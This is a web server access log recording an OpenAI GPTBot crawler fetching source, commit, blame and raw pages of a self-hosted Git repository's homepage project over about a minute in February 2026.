git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" [Client 74.7.227.38] [Length 14264] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 74.7.227.38] [Length 14870] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" +[17/Feb/2026:13:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" [Client 74.7.227.38] [Length 10097] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" +[17/Feb/2026:13:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 74.7.227.38] [Length 14900] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" +[17/Feb/2026:13:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" [Client 74.7.227.38] [Length 9821] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:13:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" [Client 74.7.227.38] [Length 9864] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" +[17/Feb/2026:13:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt" [Client 74.7.227.38] [Length 9832] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" +[17/Feb/2026:13:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" [Client 74.7.227.38] [Length 9862] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" +[17/Feb/2026:13:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 74.7.227.38] [Length 11232] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:13:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" +[17/Feb/2026:13:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal" +[17/Feb/2026:13:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" [Client 74.7.227.38] [Length 9917] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" [Client 74.7.227.38] [Length 10563] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 74.7.227.38] [Length 11453] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 74.7.227.38] [Length 11480] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 74.7.227.38] [Length 11608] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" [Client 74.7.227.38] [Length 11149] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" [Client 74.7.227.38] [Length 9913] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt" +[17/Feb/2026:13:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt" +[17/Feb/2026:13:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 74.7.227.38] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" +[17/Feb/2026:13:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 74.7.227.38] [Length 10321] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" +[17/Feb/2026:13:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" +[17/Feb/2026:13:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" +[17/Feb/2026:13:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" +[17/Feb/2026:13:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" +[17/Feb/2026:13:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" +[17/Feb/2026:13:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" +[17/Feb/2026:13:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 74.7.227.38] [Length 10824] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" +[17/Feb/2026:13:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" +[17/Feb/2026:13:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 74.7.227.38] [Length 10776] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" +[17/Feb/2026:13:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 74.7.227.38] [Length 10727] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" +[17/Feb/2026:13:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" +[17/Feb/2026:13:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" +[17/Feb/2026:13:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 74.7.227.38] [Length 11888] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 74.7.227.38] [Length 22640] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:13:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 74.7.227.38] [Length 11002] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:13:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 74.7.227.38] [Length 11818] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:13:02:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:13:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 74.7.227.38] [Length 11637] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" +[17/Feb/2026:13:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 74.7.227.38] [Length 32408] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" +[17/Feb/2026:13:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" +[17/Feb/2026:13:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" +[17/Feb/2026:13:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" [Client 74.7.227.38] [Length 16517] [Gzip 7.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" +[17/Feb/2026:13:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 74.7.227.38] [Length 11203] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" +[17/Feb/2026:13:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 74.7.227.38] [Length 9835] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +[17/Feb/2026:13:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 74.7.227.38] [Length 9844] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" +[17/Feb/2026:13:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 74.7.227.38] [Length 9832] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" +[17/Feb/2026:13:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 74.7.227.38] [Length 11154] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" +[17/Feb/2026:13:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 74.7.227.38] [Length 9830] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" +[17/Feb/2026:13:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 74.7.227.38] [Length 10687] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 74.7.227.38] [Length 10920] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" +[17/Feb/2026:13:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 74.7.227.38] [Length 25718] [Gzip 12.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +[17/Feb/2026:13:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 74.7.227.38] [Length 21952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +[17/Feb/2026:13:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" +[17/Feb/2026:13:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" +[17/Feb/2026:13:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 74.7.227.38] [Length 9960] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 